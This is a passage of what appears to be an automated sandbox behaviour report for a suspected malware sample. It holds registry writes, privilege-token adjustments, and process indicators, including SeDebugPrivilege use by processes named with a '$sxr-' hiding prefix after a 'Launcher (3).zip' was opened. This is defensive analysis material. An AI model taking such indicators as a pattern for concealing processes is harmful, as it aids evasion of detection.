Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\adc341ff-323c-4006 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f72013e8-404a-4286 = 2f29da5124f2da01 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f39d3a4e-271a-4035 = 2387105224f2da01 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4626bd97-c3db-44eb = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000fd7d505224f2da0182d2135524f2da0182d2135524f2da01b2b606000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000135929552000616639376239636562386333636165366164373863656562646235326362363564643438626264633134326532336163326566613465346237383361306232380000b20009000400efbe13592955135929552e000000000000000000000000000000000000000000000000005db98d00610066003900370062003900630065006200380063003300630061006500360061006400370038006300650065006200640062003500320063006200360035006400640034003800620062006400630031003400320065003200330061006300320065006600610034006500340062003700380033006100300062003200380000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000fb1c7a161000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c61663937623963656238633363616536616437386365656264623532636236356464343862626463313432653233616332656661346534623738336130623238000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000657268716a7679710000000000000000c8d7c3314953e644a4ec9fb3f89bbbe93b18079ed650ef1198ccde20cd0d11aac8d7c3314953e644a4ec9fb3f89bbbe93b18079ed650ef1198ccde20cd0d11aad2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003100390034003100330030003000360035002d0033003400370031003200310032003500350036002d0031003600350036003900340037003700320034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000c9aa8484000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupView = "0" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f72013e8-404a-4286 = "\\\\?\\Volume{8484AAC9-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\cd489dd0f71355abe30a4375800d6e9c6fb31a781e9d8416ca093e1af6e26975" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f72013e8-404a-4286 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000b209c25124f2da01b209c25124f2da01b209c25124f2da01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000135929552000636434383964643066373133353561626533306134333735383030643665396336666233316137383165396438343136636130393365316166366532363937350000b20009000400efbe13592955135929552e000000000000000000000000000000000000000000000000004ed1e000630064003400380039006400640030006600370031003300350035006100620065003300300061003400330037003500380030003000640036006500390063003600660062003300310061003700380031006500390064003800340031003600630061003000390033006500310061006600360065003200360039003700350000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000fb1c7a161000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c63643438396464306637313335356162653330613433373538303064366539633666623331613738316539643834313663613039336531616636653236393735000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000657268716a7679710000000000000000c8d7c3314953e644a4ec9fb3f89bbbe93318079ed650ef1198ccde20cd0d11aac8d7c3314953e644a4ec9fb3f89bbbe93318079ed650ef1198ccde20cd0d11aad2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003100390034003100330030003000360035002d0033003400370031003200310032003500350036002d0031003600350036003900340037003700320034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000c9aa8484000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa6ace0c-38ee-4b61 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a466ec27-0fbd-420b = "8324" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7c27c3af-1ce4-4f9e RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\56e140ad-72bd-4b87 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7c27c3af-1ce4-4f9e RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4626bd97-c3db-44eb = 13a62c5524f2da01 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa6ace0c-38ee-4b61 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a466ec27-0fbd-420b RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 020000000100000000000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a466ec27-0fbd-420b = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByDirection = "1" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a466ec27-0fbd-420b = 6fbdf45724f2da01 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\FFlags = "18874385" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f72013e8-404a-4286 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f39d3a4e-271a-4035 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\897909ef-7fa5-4e6a = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000000b851b5224f2da010b851b5224f2da010b851b5224f2da01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000135929552000396238393163643431613238366433356133376362343761623965616437376164346363376131383037613962646237616339623634303636323036636230350000b20009000400efbe13592955135929552e00000000000000000000000000000000000000000000000000f5558700390062003800390031006300640034003100610032003800360064003300350061003300370063006200340037006100620039006500610064003700370061006400340063006300370061003100380030003700610039006200640062003700610063003900620036003400300036003600320030003600630062003000350000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000fb1c7a161000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c39623839316364343161323836643335613337636234376162396561643737616434636337613138303761396264623761633962363430363632303663623035000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000657268716a7679710000000000000000c8d7c3314953e644a4ec9fb3f89bbbe93618079ed650ef1198ccde20cd0d11aac8d7c3314953e644a4ec9fb3f89bbbe93618079ed650ef1198ccde20cd0d11aad2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003100390034003100330030003000360035002d0033003400370031003200310032003500350036002d0031003600350036003900340037003700320034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000c9aa8484000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f72013e8-404a-4286 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7c27c3af-1ce4-4f9e = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4626bd97-c3db-44eb = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\2 = 6e00320067d29e0013592d5520004c41554e43487e332e5a49500000520009000400efbe13592d5513592e552e000000000000000000000000000000000000000000000000001bb243004c00610075006e00630068006500720020002800330029002e007a006900700000001c000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f39d3a4e-271a-4035 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\897909ef-7fa5-4e6a = be8d1f5224f2da01 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa6ace0c-38ee-4b61 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\40f7a7ee-19a2-432e = "\\\\?\\Volume{8484AAC9-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\419165c72f231ed688b46dd838505203525915ca0a80684b4c73a3cc420fc42c" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\IconSize = "16" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Rev = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\LogicalViewMode = "1" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7c27c3af-1ce4-4f9e = 14261a5224f2da01 RuntimeBroker.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3372 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 224 msedge.exe 224 msedge.exe 2596 msedge.exe 2596 msedge.exe 3668 identity_helper.exe 3668 identity_helper.exe 4320 msedge.exe 4320 msedge.exe 6032 powershell.exe 6032 powershell.exe 6032 powershell.exe 6032 powershell.exe 6032 powershell.exe 6032 powershell.exe 3908 msedge.exe 3908 msedge.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5764 $sxr-powershell.exe 5764 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5764 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5764 $sxr-powershell.exe 5764 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3372 Explorer.EXE -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
pid Process 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 6032 powershell.exe Token: SeDebugPrivilege 6032 powershell.exe Token: SeDebugPrivilege 6032 powershell.exe Token: SeDebugPrivilege 5872 $sxr-powershell.exe Token: SeDebugPrivilege 5872 $sxr-powershell.exe Token: SeDebugPrivilege 5872 $sxr-powershell.exe Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeDebugPrivilege 5764 $sxr-powershell.exe Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 4224 mousocoreworker.exe Token: SeCreatePagefilePrivilege 4224 mousocoreworker.exe Token: SeShutdownPrivilege 4224 mousocoreworker.exe Token: SeCreatePagefilePrivilege 4224 mousocoreworker.exe Token: SeShutdownPrivilege 3936 RuntimeBroker.exe Token: SeShutdownPrivilege 4224 mousocoreworker.exe Token: SeCreatePagefilePrivilege 4224 mousocoreworker.exe Token: SeShutdownPrivilege 4224 mousocoreworker.exe Token: SeCreatePagefilePrivilege 4224 mousocoreworker.exe Token: SeShutdownPrivilege 3936 RuntimeBroker.exe Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 316 dwm.exe Token: SeCreatePagefilePrivilege 316 dwm.exe Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 1152 OpenWith.exe 5872 $sxr-powershell.exe 3372 Explorer.EXE 3372 Explorer.EXE -
Suspicious use of UnmapMainImage 3 IoCs
